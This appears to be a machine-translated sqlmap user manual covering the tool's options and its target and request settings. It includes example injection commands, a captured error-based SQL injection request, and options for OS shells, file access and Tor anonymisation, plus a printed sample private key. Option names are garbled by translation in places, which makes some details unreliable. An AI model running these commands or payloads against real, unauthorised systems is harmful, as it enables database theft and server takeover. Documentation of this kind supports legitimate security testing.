SQLmap

usage

Usage: python sqlmap.py [option]

Options:
  -h, --help            Display basic help information and exit
  -hh                   Show advanced help and exit
  --version             Display program version information and exit
  -v VERBOSE            Output information detail level: 0-6((default = 1)

  Objectives:
    Provide at least one of the following options to specify the target

    -d DIRECT           Direct connection to database
    -u URL, --url=URL   target URL(For example:"http://www.site.com/vuln.php?id=1")
    -l LOGFILE          from Burp or WebScarab Resolve the destination address in the agent's log file
    -m BULKFILE         Get batch target from text file
    -r REQUESTFILE      Read from file HTTP request
    -g GOOGLEDORK       use Google dork Results as goals
    -c CONFIGFILE       from INI Load options in configuration file

  Request:
    The following options specify how to connect to the destination address

    --method=METHOD     Mandatory use of provided HTTP Method (e.g.: PUT)
    --data=DATA         use POST Send data string (for example:"id=1")
    --param-del=PARA..  Set the parameter value separator (for example:&)
    --cookie=COOKIE     appoint HTTP Cookie(For example:"PHPSESSID=a8d127e..")
    --cookie-del=COO..  set up cookie Separator (for example:;)
    --load-cookies=L..  Specify to Netscape/wget Format storage cookies Documents
    --drop-set-cookie   ignore HTTP In response Set-Cookie parameter
    --user-agent=AGENT  appoint HTTP User-Agent
    --random-agent      Use random HTTP User-Agent
    --host=HOST         appoint HTTP Host
    --referer=REFERER   appoint HTTP Referer
    -H HEADER, --hea..  Set additional HTTP Header parameters (for example:"X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Set additional HTTP Header parameters (for example:"Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP Authentication mode( Basic，Digest，NTLM or PKI)
    --auth-cred=AUTH..  HTTP Certification certificate( username:password)
    --auth-file=AUTH..  HTTP authentication PEM certificate/Private key file
    --ignore-code=IG..  Ignore (problematic) HTTP Error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeout
    --proxy=PROXY       Connect to target using proxy URL
    --proxy-cred=PRO..  Use proxy for authentication( username:password)
    --proxy-file=PRO..  Load agent list from file
    --tor               use Tor anonymous network 
    --tor-port=TORPORT  set up Tor Proxy port replaces default port
    --tor-type=TORTYPE  set up Tor Agency mode( HTTP，SOCKS4 or SOCKS5(Default)
    --check-tor         Check whether it is used correctly Tor
    --delay=DELAY       Set each HTTP Requested delay seconds
    --timeout=TIMEOUT   Set the number of valid seconds for the connection response (the default is 30)
    --retries=RETRIES   Number of retries when the connection times out (the default is 3)
    --randomize=RPARAM  Randomly change the given parameter value
    --safe-url=SAFEURL  It can be accessed frequently and legally during the test URL Address:
                        Some websites will close the session connection when you visit the wrong address several times in a row,
                        (detailed in the "request" section later)
    --safe-post=SAFE..  use POST Method to send legal data
    --safe-req=SAFER..  Load legal from file HTTP request
    --safe-freq=SAFE..  Every two visits to a given legal URL Only one test request was sent
    --skip-urlencode    incorrect payload Data processing URL code
    --csrf-token=CSR..  Set up a website for anti CSRF Aggressive token
    --csrf-url=CSRFURL  Specify extractable anti aliases CSRF attack token of URL
    --force-ssl         Mandatory use SSL/HTTPS
    --hpp               use HTTP Parameter pollution attack
    --eval=EVALCODE     Execute the given before initiating the request Python Code (e.g.:
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

  Optimization:
    The following options are used for optimization sqlmap performance

    -o                  Turn on all optimization switches
    --predict-output    Predict the output of common requests
    --keep-alive        Use persistent HTTP(S) connect
    --null-connection   Get only the page size, not the actual size HTTP response
    --threads=THREADS   set up HTTP(S) Maximum number of concurrent requests (1 by default)

  Injection:
    The following options are used to specify the parameters to be tested,
    Provide custom injection payloads And scripts that tamper with parameters

    -p TESTPARAMETER    Specify the parameters to be tested
    --skip=SKIP         Specify the parameters to skip
    --skip-static       Specifies to skip non dynamic parameters
    --param-exclude=..  Exclude parameters with regular expressions (for example:"ses")
    --dbms=DBMS         Specify backend DBMS(Database Management System，
                        Database management system) type (for example: MySQL)
    --dbms-cred=DBMS..  DBMS Authentication credentials( username:password)
    --os=OS             Specify backend DBMS Operating system type
    --invalid-bignum    Set invalid value to large
    --invalid-logical   Use logical operations on invalid values
    --invalid-string    Use random string for invalid value
    --no-cast           close payload Structural mechanism
    --no-escape         Turn off string escape mechanism
    --prefix=PREFIX     injection payload Prefix string for
    --suffix=SUFFIX     injection payload Suffix string for
    --tamper=TAMPER     Modify the injected data with the given script

  testing:
    The following options are used to customize the detection method

    --level=LEVEL       Set test level (1)-5，(default = 1)
    --risk=RISK         Set test risk level (1)-3，(default = 1)
    --string=STRING     String used to determine when the query result is true
    --not-string=NOT..  String used to determine when the query result is false
    --regexp=REGEXP     The regular expression used to determine when the query result is true
    --code=CODE         Used to determine when the query result is true HTTP Status code
    --text-only         Compare pages only according to the text content of the page
    --titles            Compare pages by page title only

  Technology:
    The following options are used to adjust specific SQL Test method of injection technology

    --technique=TECH    Used SQL Injection technology (default is“ BEUSTQ"，Translator's note:
                        B: Boolean-based blind SQL injection(Boolean blind note)
                        E: Error-based SQL injection(Error reporting (injection)
                        U: UNION query SQL injection(Joint query injection)
                        S: Stacked queries SQL injection(Stack query injection)
                        T: Time-based blind SQL injection(Time blind injection)
                        Q: inline Query injection(Inline query injection)
    --time-sec=TIMESEC  delay DBMS Number of response seconds (default is 5)
    --union-cols=UCOLS  Set the range of columns for the federated query injection test
    --union-char=UCHAR  Characters used to guess the number of columns
    --union-from=UFROM  Set federated query injection FROM Table used at
    --dns-domain=DNS..  Set for DNS Domain name of exudation attack
                        Recommended reading in SQL Used in injection DNS Getting data
                        http://cb.drops.wiki/drops/tips-5283.html，
                        (it is also explained in the "technology" section later)
    --second-url=SEC..  Set the result display page of the second-order response URL(Translator's note:
                        This option is used for SQL Second order injection)
    --second-req=SEC..  Read from file HTTP Second order request

  Fingerprint identification:
    -f, --fingerprint   Implement extensive DBMS Version fingerprint identification

  Enumeration:
    The following options are used to get the backend DBMS Information, structure and data in the data table.
    In addition, you can run the data you enter SQL sentence

    -a, --all           Obtain all information and data
    -b, --banner        obtain DBMS banner
    --current-user      obtain DBMS Current user
    --current-db        obtain DBMS Current database
    --hostname          obtain DBMS Host name of the server
    --is-dba            probe DBMS Whether the current user is DBA(Database administrator)
    --users             Mei juchu DBMS All users
    --passwords         Mei juchu DBMS Password hash for all users
    --privileges        Mei juchu DBMS All user privilege levels
    --roles             Mei juchu DBMS All user roles
    --dbs               Mei juchu DBMS All databases
    --tables            Mei juchu DBMS All tables in the database
    --columns           Mei juchu DBMS All columns in the table
    --schema            Mei juchu DBMS All modes
    --count             Get the number of data tables
    --dump              export DBMS Database table entry
    --dump-all          Export all DBMS Database table entry
    --search            Search columns, tables, and/Or database name
    --comments          Check when enumerating data DBMS notes
    -D DB               Specify the to enumerate DBMS database
    -T TBL              Specify the to enumerate DBMS data sheet
    -C COL              Specify the to enumerate DBMS Data column
    -X EXCLUDE          Specifies a non enumerating DBMS identifier 
    -U USER             Specifies the of the enumeration DBMS user
    --exclude-sysdbs    Specifies that a specific system database is excluded when enumerating all data tables
    --pivot-column=P..  Specify primary column
    --where=DUMPWHERE   Used when dumping tables WHERE Conditional statement
    --start=LIMITSTART  Specifies the number of starting rows of data table entries to export
    --stop=LIMITSTOP    Specifies the number of end rows of data table entries to export
    --first=FIRSTCHAR   Specifies the starting character bit to get and return the query result
    --last=LASTCHAR     Specifies the end character bit to get and return the query result
    --sql-query=QUERY   Specify the to perform SQL sentence
    --sql-shell         Call up interactive SQL shell
    --sql-file=SQLFILE  Execute in file SQL sentence

  Brute force cracking:
    The following options are used for brute force testing

    --common-tables     Check whether common table names exist
    --common-columns    Detect whether common column names exist

  User defined function injection:
    The following options are used to create user-defined functions

    --udf-inject        Inject user-defined functions
    --shared-lib=SHLIB  Local path to shared library

  Access file system:
    The following options are used to access the backend DBMS Underlying file system

    --file-read=FILE..  Read backend DBMS Files in the file system
    --file-write=FIL..  Write to backend DBMS Files in the file system
    --file-dest=FILE..  Write to back end using absolute path DBMS Files in

  Access operating system:
    The following options are used to access the backend DBMS Underlying operating system

    --os-cmd=OSCMD      Execute operating system commands
    --os-shell          Call up interactive operating system shell
    --os-pwn            call out OOB shell，Meterpreter or VNC
    --os-smbrelay       One key call up OOB shell，Meterpreter or VNC
    --os-bof            Buffer overflow using stored procedures
    --priv-esc          Database process user authorization
    --msf-path=MSFPATH  Metasploit Local installation path of the framework
    --tmp-path=TMPPATH  Absolute path to the remote temporary file directory

  visit Windows Registry:
    The following options are used to access the backend DBMS of Windows registry

    --reg-read          Read one Windows Registry keys 
    --reg-add           Write a Windows Registry key data
    --reg-del           Delete a Windows Registry keys 
    --reg-key=REGKEY    appoint Windows registry key 
    --reg-value=REGVAL  appoint Windows Registry keys 
    --reg-data=REGDATA  appoint Windows Registry key data
    --reg-type=REGTYPE  appoint Windows Registry key type

  General options:
    The following options are used to set common parameters

    -s SESSIONFILE      From file(.sqlite)Read session information in
    -t TRAFFICFILE      Save all HTTP Record traffic to specified text file
    --batch             Never ask for user input and use the default configuration
    --binary-fields=..  Result fields with binary values (for example:"digest")
    --check-internet    Check whether you are connected to the Internet properly before accessing the target
    --crawl=CRAWLDEPTH  From target URL Start crawling website
    --crawl-exclude=..  Filter crawled pages with regular expressions (for example:"logout")
    --csv-del=CSVDEL    Specify output to CVS The separator used when the file is (default is)“,")
    --charset=CHARSET   appoint SQL Blind annotation character set (for example:"0123456789abcdef")
    --dump-format=DU..  Format of exported data( CSV(Default), HTML or SQLITE)
    --encoding=ENCOD..  Specifies the character encoding to use when getting data (for example: GBK)
    --eta               Displays the estimated arrival time of each result output
    --flush-session     Empty the session file of the current target
    --forms             Analyze and test targets URL Form for
    --fresh-queries     Ignore query results stored in the session file
    --har=HARFILE       Will all HTTP Flow recorded to a HAR In the file
    --hex               Use when getting data hex transformation
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display from response DBMS error message
    --preprocess=PRE..  Preprocess the response data with the given script
    --repair            Re export data with unknown characters(?)
    --save=SAVECONFIG   Save option settings to a INI configuration file
    --scope=SCOPE       Filter targets from the provided agent logs with regular expressions
    --test-filter=TE..  according to payloads and/Or title (for example: ROW)Select test
    --test-skip=TEST..  according to payloads and/Or title (for example: BENCHMARK)Skip some tests
    --update            to update sqlmap

  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (for example:“ flu,bat,ban,tec=EU")
    --alert=ALERT       Find in SQL Run on injection OS command
    --answers=ANSWERS   Set predefined answers (for example:“ quit=N,follow=N")
    --beep              Remind or find problems SQL Prompt tone during injection
    --cleanup           Specify remove DBMS Specific in UDF Or data sheet
    --dependencies      inspect sqlmap Missing (optional) dependency
    --disable-coloring  Turn off color console output
    --gpage=GOOGLEPAGE  Specify page number usage Google dork result
    --identify-waf      in the light of WAF/IPS Thoroughly test the protection
    --mobile            use HTTP User-Agent Imitate smart phones
    --offline           Working in offline mode (using session data only)
    --purge             Safe deletion sqlmap data All contents of the directory
    --skip-waf          Skip heuristic detection WAF/IPS protect
    --smart             Thorough testing is only performed when heuristic detection is used
    --sqlmap-shell      Call up interactive sqlmap shell
    --tmp-dir=TMPDIR    Specifies the local directory where temporary files are stored
    --web-root=WEBROOT  appoint Web Server root directory (for example:"/var/www")
    --wizard            Wizard interface for beginner users

Output level of detail

Options: - v

This option is used to set the level of detail of the output information. There are seven levels in total. The default level is 1, and the output includes general information, warnings, errors, key information and Python error response information (if any).

• 0: only Python error backtracking information, error and key information are output.
• 1: Increase the output of general information and warning information.
• 2: Add output debugging information.
• 3: Increase the output of injected payloads.
• 4: Add output HTTP request.
• 5: Add output HTTP response header
• 6: Increase the content of output HTTP response.

Using level 2 can better understand what is implemented inside the sqlmap, especially in the detection phase and when using the takeover function. If you want to know what SQL payloads sqlmap sends, level 3 is the best choice. When you provide potential Bug reports for the developer system, it is recommended to use this level and attach the standard output file of the traffic log file generated with the option - t.

When it is necessary to detect potential Bugs more deeply or deal with unknown situations, it is recommended to use grade 4 or above. It should be noted that the short name of this option can also be used to set the level of detail, where the switch provided (rather than the option) determines the level of detail with the number of letters v (for example, - v instead of - v 2, - vv instead of - v 3, - vvv instead of - v 4, and so on).

target

Provide at least one of the following options to specify the target.

Direct database

Options: - d

Run the sqlmap tool for a single database instance. This option can be set to a connection string in the following format:

• DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, etc.)
• DBMS://DATABASE_FILEPATH (SQLite, Microsoft Access, Firebird, etc.)

For example:

$ python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --bann\
er --dbs --users

Destination URL

Options: - u or -- url

Run sqlmap against a single target URL. This option can be set to a URL in the following format:

http(s)://targeturl[:port]/[...]

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs -\
-users

Resolve target from Burp or WebScarab proxy log

Options: - l

In addition to providing a single target URL, you can also test and inject Burp agent perhaps WebScarab proxy Proxy HTTP request. When using this parameter, you need to provide the log file of proxy HTTP request.

Parse target from remote site map (. xml)

Options: - x

Through the site map, the site manager can list all the page positions of the website to inform the search engine of the content structure of the site. You can use the option - x to provide the site map address to sqlmap (for example: - x http://www.target.com/sitemap.xml )To search for available target URLs.

Read multiple targets from a given text file for scanning

Options: - m

Provide a list of target URLs through the text file, and sqlmap will scan and detect one by one.

Example of URLs list provided by sample file:

www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*

Load HTTP request from file

Options: - r

sqlmap can read the original HTTP request from a text. In this way, you can avoid setting some options (such as setting cookies, POST data and other parameters).

The data sample of HTTP request file is as follows:

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

If the relevant request is HTTPS, you can use the -- force SSL switch to force the use of SSL for 443/tcp connection. Alternatively, you can add 443 directly after the Host header.

Use the Google dork result as the destination address

Options: - g

sqlmap also supports testing and injecting GET parameters according to the results returned by Google dork.

This option enables sqlmap to interact with the current session cookies of the search engine and carry out relevant search operations. Then sqlmap will GET the first 100 returned results filtered out by Google dork expression and the attached GET parameters, and ask you whether to test the injection for each URL that may have injection.

For example:

$ python sqlmap.py -g "inurl:\".php?id=1\""

Read options from INI configuration file

Options: - c

Sqlmap supports reading the user's option configuration from the INI configuration file, for example: sqlmap conf.

It should be noted that if you provide relevant option settings when calling from the command line, the options in the configuration file will be overwritten and invalidated.

request

The following options specify how to connect to the destination URL.

HTTP method

Options: - method

Sqlmap can automatically detect the HTTP methods used in HTTP requests. However, in some cases, it may be necessary to force the specification of HTTP methods that will not be used by sqlmap automation (for example, PUT). Therefore, this option may be used (for example: -- method=PUT).

HTTP data

Options: - data

The default method of HTTP request is GET. You can implicitly change GET to POST by providing the corresponding sent data in the request. Like the GET parameter, the corresponding parameter is also used to test whether SQL injection is possible.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banne\
r --dbs --users

Parameter separator

Options: - param del

In some cases, you need to override the default parameter separator (for ex amp le, &, in GET and POST data) so that sqlmap can cut and process each parameter correctly.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=\
1" --param-del=";" -f --banner --dbs --users

HTTP Cookie request header

Options and switches: - Cookie, - Cookie del, - load cookie and -- drop set cookie

These options and switches can be used in two situations:

• Web applications require cookie based authentication, and you know the corresponding parameters.
• You want to detect the relevant HTTP headers and inject SQL.

In either case, you need to use sqlmap to send a request with cookies. The steps are as follows:

• Log in to the app using your favorite browser.
• Copy cookies from the browser's options or HTTP proxy.
• Go back to the shell and run sqlmap with the copied cookie as the option -- the value of the cookie.

Note that HTTP Cookie values are usually composed of characters; Separate instead of using &. sqlmap can also recognize them as parameter=value, that is, parameter value pairs, and the corresponding GET and POST parameters are the same. If the separator character is not;, You can use the option -- cookie del to specify.

At any time during communication, if the response of the Web application contains a set Cookie response header, sqlmap will automatically use its value as the Cookie value in all other HTTP requests. Sqlmap will also automatically test these values for SQL injection vulnerabilities. This feature can be turned off by providing a switch -- drop set Cookie -- and sqlmap ignores any set Cookie response header.

Conversely, if you provide an HTTP Cookie request header with the option cookie, and the target URL sends an HTTP set cookie response header at any time, sqlmap will ask you which set of cookies to use for the next HTTP request.

There is also an option - load cookies, which can read cookies from special files containing cookies in Netscape/wget format.

Note that if -- level is set to 2 or higher, sqlmap will perform SQL injection test on HTTP Cookie request header. See below for details.

HTTP user agent request header

Options and switches: -- user agent and -- random agent

By default, sqlmap executes HTTP requests using the following user agent request header values:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

However, it can be forged by providing a custom user agent as a parameter of the option, that is, the option -- user agent.

In addition, if you provide a switch -- random agent, the sqlmap will start from/ txt/user-agents.txt text file and use it for all HTTP requests in the session.

Some sites will check the HTTP user agent request header. If no valid user agent is provided, its value is not a normal value, or is blacklisted by the Web application firewall or similar defense system, the server will reject the HTTP response. In this case, sqlmap will display the following information:

[hh:mm:20] [ERROR] the target URL responded with an unknown HTTP status code, try to 
force the HTTP User-Agent header with option --user-agent or --random-agent
 Translation:
[hh:mm:20] [error] The target URL replied to an unknown HTTP Status code, please try the option --user-agent or 
--random-agent Mandatory assignment HTTP User-Agent Request header

Note that if -- level is set to 3 or above, sqlmap will perform SQL injection test on HTTP user agent request header. See below for details.

HTTP Host request header

Options: - host

You can manually set the HTTP Host request header value. By default, the HTTP Host request header is parsed from the provided target URL.

Note that if -- level is set to 5 or above, sqlmap will perform SQL injection test on HTTP user agent request header. See below for details.

HTTP Referer request header

Options: - referer

Supports forging HTTP Referer request header values. If there is no explicit setting, the HTTP Referer request header will not be sent in the HTTP request by default.

Note that if -- level is set to 3 or higher, sqlmap will test the HTTP Referer request header for SQL injection. See below for details.

Additional HTTP request headers

Options: - headers

You can provide additional HTTP request headers by setting the option -- headers. Each request header must be separated by a newline character, which is better read from the INI configuration file. You can look at the template sqlmap Examples in the conf file.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z \
"ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
[...]
[xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\
OUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C\
0x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\
CTER_SETS%20GROUP%20BY%20x%29a%
29 HTTP/1.1
Host: www.target.com
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Firefox 1.0
Connection: close
[...]

HTTP protocol authentication

Options: - auth type and -- auth cred

These options are used to specify the HTTP protocol authentication implemented by the back-end Web server and all valid credentials for initiating HTTP requests to the target program.

The three HTTP protocol authentication mechanisms supported are:

• Basic
• Digest
• NTLM

The syntax of authentication credentials is username:password.

A grammatical example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id\
=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP protocol private key authentication

Options: - auth file

This option should be used when the Web server requires the correct client certificate and private key for authentication. The value provided should be a PEM format file key containing the certificate and private key_file.

Generate key for -- auth file option_ file. Txt file example:

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout auth_file.key -out auth_file.pem &&\
cat auth_file.key auth_file.pem > auth_file.txt && cat auth_file.txt
Generating a 2048 bit RSA private key
.........+++
...........+++
writing new private key to 'auth_file.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCWM28J1ua2DINf
VLU28oeJwQidL9vTRoGJR5pfBU6Mhu33Cv6RuVEJAfMWEKYDSbqbrEyy1zUiNTcG
mEd026Peq0SPRvsKsVb6K+EHVF3r+6ExXHEctPRbh2GIzi2kCQMkdHDg+DhmieQ9
9Haxk9IREJZTo2vC1ohvM5M/yubw4iwgMlDaW+4s82OgOcCLjewbPLFZU5gMV+8W
XLKUttUYwV79duPbEvG9S1soNFHhu/MOcNiKJpH2zSegd9Dk5/OJRGX5xEiv7AyL
4shQLpAqn5kuZcm2K+ib/4x/Rw2yT1Slh2tQIi8RcwlYyycOrSqvhW7vvdqkblbY
mQQyR2ChAgMBAAECggEBAIqvMveC1cOCCksbi7cQeNVYxvtcFT0e/LwkwQS7gat/
anmQTT2APrJyemEFPkQK76KNlMQMsaLEP+p28IOVydjvin5Aq8tTs1uK6Fw8Kfya
elt5X3eCHZ3lgskuljW/nIcsfI08o9cJuxT5hB6yvmPDTQos+nMMYy1KEcv1LQd8
Y+QAmVQqMF5Nyf8Q6op6hWZIIJY5NDbRE0zYzhGcHWg2798Dx1sO0HT6TD8cNP8H
AVp/V21tzpmFpe0A7NajgYEjkij6fg+6mG0j0WZdWymYXDeiTdDpwzs/SPRevBLn
Okp/6vqtdekMeYL591MNBl8GRZpJW9gNLRX7vQ6YYAECgYEAxGV9e85GpLUd/uUb
1MvGajd+HtN/uoWH1ySG34vi3q/dDKBehry2yoDUosxXf9vbH0IrvaXnO8yXGflS
wb2TELLezGWbw6kPaw2XIgL4elO5TPh2rNJwz1wOhv3FT2XSGJbXx/CED3mL7MGs
qwRU/bRrNV7RmzV2veThlLCLjZECgYEAw8jm7vOzQQnqEjs0wlfJmzOyFqilYvEP
8v7HxDv1M7e7M0TqLECET9VlQE5spGuzEWN7/iMtE8xxnz2n/vGnGAV8qv1LJYrA
TWQMTIC6V9/jKM8wNOfT7Eh1rJ1cty87yokXpy/cdmkv7yxb1b2zuBk8/1nlYqA0
5uqb345eWhECgYEAmoXv0TVfR8BpNWA2IZujJXc7+C0YVj0xwAixRbneaq+cEI8t
UH2ypGnw45Y7UhI9ub5qg/DAmsBCMuGER4NM7tqNiex4Pd4Kj4RF4TDNKBIvvWvQ
k/GPaNdZZsTMNcg7IbWtWVbX0QUlHsbTgEsMRAFsSLWt3ZyXLJmlE0REyMECgYEA
oCqEscrwRC7GLK/+01ZZ+fvqnxrMYgrvj0zbRDAAwpR2MtUX9ae6Fk1vDZKa0k/B
KGKIlzlTsTS5ZxpbivdKSR6EBKY+ibHe6/EDFrrgtu7TuRj2SPG2rz//9Hyv0rRz
Z5eLoBxJcR1QN4vEfTE6C0uqWQPD4lFJtfcMGXEwwuECgYAK+4gwPBlrKClrRtDc
7Fnq8RLYeZRbM5WEmTHfRnlYylniMsj2K20H8ln8pdOqCE4iJn0SezIQIaAtcwMP
WQt15kgJgLwM/uBtqDeWRpTEotVMFXQbZImobjpXUhTqu0NWBwbypM/zarfRWPJ4
fJkrlA16caVj3qGaX1lkm06OAA==
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDXTCCAkWgAwIBAgIJALTHPlkIs/+KMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV
BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
aWRnaXRzIFB0eSBMdGQwHhcNMTgwODIyMDc0NTQxWhcNMTkwODIyMDc0NTQxWjBF
MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50
ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAljNvCdbmtgyDX1S1NvKHicEInS/b00aBiUeaXwVOjIbt9wr+kblRCQHz
FhCmA0m6m6xMstc1IjU3BphHdNuj3qtEj0b7CrFW+ivhB1Rd6/uhMVxxHLT0W4dh
iM4tpAkDJHRw4Pg4ZonkPfR2sZPSERCWU6NrwtaIbzOTP8rm8OIsIDJQ2lvuLPNj
oDnAi43sGzyxWVOYDFfvFlyylLbVGMFe/Xbj2xLxvUtbKDRR4bvzDnDYiiaR9s0n
oHfQ5OfziURl+cRIr+wMi+LIUC6QKp+ZLmXJtivom/+Mf0cNsk9UpYdrUCIvEXMJ
WMsnDq0qr4Vu773apG5W2JkEMkdgoQIDAQABo1AwTjAdBgNVHQ4EFgQUVvHI/2qF
kmRCEWlWB+ZvJzWTnUkwHwYDVR0jBBgwFoAUVvHI/2qFkmRCEWlWB+ZvJzWTnUkw
DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAg5tmkM75/NEEymu0ublj
c2R1/ZxwbKMjg98KxLqGFJbPVRG0qgIy+uc+Gvh6FEgPF22i4L9DROfuDQW3YSJ6
x3JnJxLsU+jjXxtN7hNwoQziQkicKr0y47TjqOKLlBlKTbdnr74nJXSYQhi4qEFE
qgrUG7ScitgLvcf2sDVf9L2SUsH5iRK+HlgYEtSKhUl5SkLapcUUF+GmectUOkm7
m7Z8gelenVUerLojnQL2avKD07hWTTGkgX2PV8hdun0WIvBLWAcJN+6T9sdakJZZ
qJjFQBXjcxwgVe0vB0vJmqa5lj9OymQnBMjp+3zpUtDJNH2M1qySbU6tGEX1wsW/
VA==
-----END CERTIFICATE-----

Ignore HTTP 401 (unauthorized) error

Switch -- ignore-401

If the target site you test occasionally returns an HTTP 401 (unauthorized) error, and you want to ignore it, do not provide the correct credentials and continue the test, you can use the switch -- ignore-401 to turn off the corresponding error reminder.

HTTP(S) proxy

Options and switches: - proxy, -- proxy cred, -- proxy file and -- ignore proxy

You can use the option -- proxy and provide the HTTP(S) proxy address to make the HTTP(S) request reach the target URL through the proxy. The syntax for setting the HTTP(S) proxy is http://url:port .

If the HTTP(S) proxy requires authentication, you can add the corresponding credentials in the format of username:password for the option -- proxy cred.

If you want to use the (unstable) proxy list, skip and use the next proxy when possible connection problems (e.g. preventing intrusive IP addresses) occur, you can use the option -- proxy file and specify the file containing the bulk proxy.

When you want to use sqlmap to test local LAN targets, you should use the switch ignore proxy to bypass the system level HTTP(S) proxy service.

Tor anonymous network

Switches and options: - tor, - tor port, - tor type and -- check tor

If you need to remain anonymous for relevant reasons, you can Tor installation guide Configure one Tor client and Privoxy (or similar) instead of using a single predefined HTTP(S) proxy server. Then you can use the switch -- Tor to make sqlmap try to set up Tor proxy connection automatically.

If you want to manually set the type and port of Tor agent, you can use the options -- Tor type and -- Tor port (for example: -- Tor type = Socks5 -- Tor port 9050).

It is strongly recommended to use -- check Tor occasionally to ensure that everything is set correctly. In some cases, the wrong configuration (or resetting the previous configuration) of Tor package (such as Vidalia) will make you think you have successfully anonymized. Using this switch, sqlmap will send a request to before making a request to any target Are you using Tor? This official page checks whether all configurations are normal. If the check fails, sqlmap will warn you and exit directly.

Delay between each HTTP request

Options: - delay

You can specify the number of seconds to wait between each HTTP(S) request. The valid value is a floating-point number. For example, 0.5 means half a second. By default, no delay is set.

Timeout connection wait seconds

Options: - timeout

You can specify the number of seconds to wait for an HTTP(S) request to time out. The valid value is a floating-point number. For example, 10.5 means ten and a half seconds. The default setting is 30 seconds.

HTTP connection timeout maximum retries

Options: - retries

You can specify the maximum number of retries for HTTP(S) connection timeout. By default, it retries up to three times.

